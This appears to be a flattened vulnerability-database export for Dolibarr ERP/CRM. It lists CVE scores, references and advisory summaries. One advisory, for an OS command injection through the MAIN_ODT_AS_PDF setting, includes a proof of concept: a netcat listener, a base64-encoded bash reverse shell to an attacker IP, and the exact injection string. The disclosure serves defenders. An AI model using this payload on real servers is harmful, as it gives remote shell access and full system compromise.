published_at 2026-06-06T12:55:00Z
1
value 9e-05
scoring_system epss
scoring_elements 0.01023
published_at 2026-06-07T12:55:00Z
2
value 9e-05
scoring_system epss
scoring_elements 0.01021
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-7689
1
reference_url https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-7689
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-7689
4
reference_url https://vuldb.com/submit/801794
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://vuldb.com/submit/801794
5
reference_url https://vuldb.com/vuln/360859
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://vuldb.com/vuln/360859
6
reference_url https://vuldb.com/vuln/360859/cti
reference_id
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
4
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/
url https://vuldb.com/vuln/360859/cti
7
reference_url https://github.com/advisories/GHSA-jggh-5rmh-r6h5
reference_id GHSA-jggh-5rmh-r6h5
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jggh-5rmh-r6h5
fixed_packages
aliases CVE-2026-7689, GHSA-jggh-5rmh-r6h5
risk_score 2.9
exploitability 0.5
weighted_severity 5.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k9nc-tze6-k7bx
18
url VCID-mpmz-eh21-nkcm
vulnerability_id VCID-mpmz-eh21-nkcm
summary 
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
### Summary
An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.

### Details
The vulnerability is located in `htdocs/includes/odtphp/odf.php`.
When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.

Code snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):
```php
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
```

While the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.

### PoC
**Prerequisites:**
1. Login as an Administrator.
2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup.

**Steps to reproduce (Reverse Shell):**

1.  Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):
   ```bash
   nc -lvnp 4445
   ```

2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:
   ```bash
   # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
   echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
   # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
   ```

3. Navigate to **Home -> Setup -> Other Setup**.

4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:
   ```bash
   jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
   ```
   *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*
<img width="1898" height="696" alt="image" src="https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316" />

5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.
<img width="1907" height="668" alt="image" src="https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242" />
<img width="1858" height="346" alt="image" src="https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7" />
<img width="848" height="183" alt="image" src="https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1" />

6. Check the netcat listener. A connection will be established, granting a shell on the server:
 
<img width="616" height="193" alt="image" src="https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37" />


### Impact
**Remote Code Execution (RCE).**
An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:
- Reading sensitive configuration files (database credentials).
- Modifying application code.
- Full system compromise depending on server configuration (e.g., docker escape, pivoting).

---

### Credits
Reported by Łukasz Rybak
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-23500
reference_id
reference_type
scores
0
value 0.00166
scoring_system epss
scoring_elements 0.37468
published_at 2026-06-07T12:55:00Z
1
value 0.00166
scoring_system epss
scoring_elements 0.375
published_at 2026-06-06T12:55:00Z
2
value 0.00166
scoring_system epss
scoring_elements 0.37495
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-23500
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/
url https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0
3
reference_url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/
url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-23500
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-23500
5
reference_url https://github.com/advisories/GHSA-w5j3-8fcr-h87w
reference_id GHSA-w5j3-8fcr-h87w
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w5j3-8fcr-h87w
fixed_packages
aliases CVE-2026-23500, GHSA-w5j3-8fcr-h87w
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mpmz-eh21-nkcm
19
url VCID-pfyf-s4fc-d3a8
vulnerability_id VCID-pfyf-s4fc-d3a8
summary 
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/
url http://dolibarr.com
1
reference_url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/
url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-38887
reference_id
reference_type
scores
0
value 0.03022
scoring_system epss
scoring_elements 0.86886
published_at 2026-06-07T12:55:00Z
1
value 0.03022
scoring_system epss
scoring_elements 0.86894
published_at 2026-06-05T12:55:00Z
2
value 0.03022
scoring_system epss
scoring_elements 0.8689
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-38887
3
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-38887
reference_id CVE-2023-38887
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-38887
5
reference_url https://github.com/advisories/GHSA-g8h7-mcp6-pf47
reference_id GHSA-g8h7-mcp6-pf47
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g8h7-mcp6-pf47
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-38887, GHSA-g8h7-mcp6-pf47
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pfyf-s4fc-d3a8
20
url VCID-rqux-jkta-4kfj
vulnerability_id VCID-rqux-jkta-4kfj
summary 
Logic error in dolibarr/dolibarr
Business Logic Errors in GitHub repository dolibarr/dolibarr prior to 16.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0746
reference_id
reference_type
scores
0
value 0.00215
scoring_system epss
scoring_elements 0.44032
published_at 2026-06-04T12:55:00Z
1
value 0.00215
scoring_system epss
scoring_elements 0.44084
published_at 2026-06-07T12:55:00Z
2
value 0.00215
scoring_system epss
scoring_elements 0.44109
published_at 2026-06-06T12:55:00Z
3
value 0.00215
scoring_system epss
scoring_elements 0.44101
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0746
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21
3
reference_url https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0746
reference_id CVE-2022-0746
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0746
5
reference_url https://github.com/advisories/GHSA-8vq6-5f66-hp3r
reference_id GHSA-8vq6-5f66-hp3r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8vq6-5f66-hp3r
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-0746, GHSA-8vq6-5f66-hp3r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rqux-jkta-4kfj
21
url VCID-s3xn-47cy-eucf
vulnerability_id VCID-s3xn-47cy-eucf
summary 
Cross site scripting in dolibarr
A Cross-site Scripting (XSS) vulnerability exists in the admin/accountant.php file. The fields `town`, `name`, and `Accountant code` can be used to escape double quote protection.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-2060
reference_id
reference_type
scores
0
value 0.00511
scoring_system epss
scoring_elements 0.668
published_at 2026-06-04T12:55:00Z
1
value 0.00511
scoring_system epss
scoring_elements 0.66832
published_at 2026-06-07T12:55:00Z
2
value 0.00511
scoring_system epss
scoring_elements 0.66848
published_at 2026-06-06T12:55:00Z
3
value 0.00511
scoring_system epss
scoring_elements 0.6684
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-2060
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f
3
reference_url https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-2060
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-2060
5
reference_url https://github.com/advisories/GHSA-8fvr-7945-mg7w
reference_id GHSA-8fvr-7945-mg7w
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8fvr-7945-mg7w
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-2060, GHSA-8fvr-7945-mg7w
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s3xn-47cy-eucf
22
url VCID-srth-2stq-gyaq
vulnerability_id VCID-srth-2stq-gyaq
summary 
Dolibarr has an Injection issue
A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. This affects the function _checkValForAPI of the file htdocs/expedition/class/expedition.class.php of the component Shipments API Endpoint. The manipulation of the argument fields leads to sql injection. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-7688
reference_id
reference_type
scores
0
value 0.00028
scoring_system epss
scoring_elements 0.08308
published_at 2026-06-05T12:55:00Z
1
value 0.00028
scoring_system epss
scoring_elements 0.08297
published_at 2026-06-07T12:55:00Z
2
value 0.00028
scoring_system epss
scoring_elements 0.08316
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-7688
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-7688
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-7688
3
reference_url https://vuldb.com/submit/799337
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
2
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
3
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 2.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/
url https://vuldb.com/submit/799337
4
reference_url https://vuldb.com/vuln/360858
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
2
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
3
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 2.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/
url https://vuldb.com/vuln/360858
5
reference_url https://vuldb.com/vuln/360858/cti
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR
1
value 5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
2
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
3
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 1.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 2.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/
url https://vuldb.com/vuln/360858/cti
6
reference_url https://github.com/advisories/GHSA-rvwr-q5hj-wq7g
reference_id GHSA-rvwr-q5hj-wq7g
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rvwr-q5hj-wq7g
fixed_packages
aliases CVE-2026-7688, GHSA-rvwr-q5hj-wq7g
risk_score 2.2
exploitability 0.5
weighted_severity 4.5
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-srth-2stq-gyaq
23
url VCID-tmv2-39y8-f7f1
vulnerability_id VCID-tmv2-39y8-f7f1
summary 
Dolibarr vulnerable to Eval Injection
Dolibarr ERP & CRM <=15.0.3 are vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-40871
reference_id
reference_type
scores
0
value 0.51559
scoring_system epss
scoring_elements 0.97945
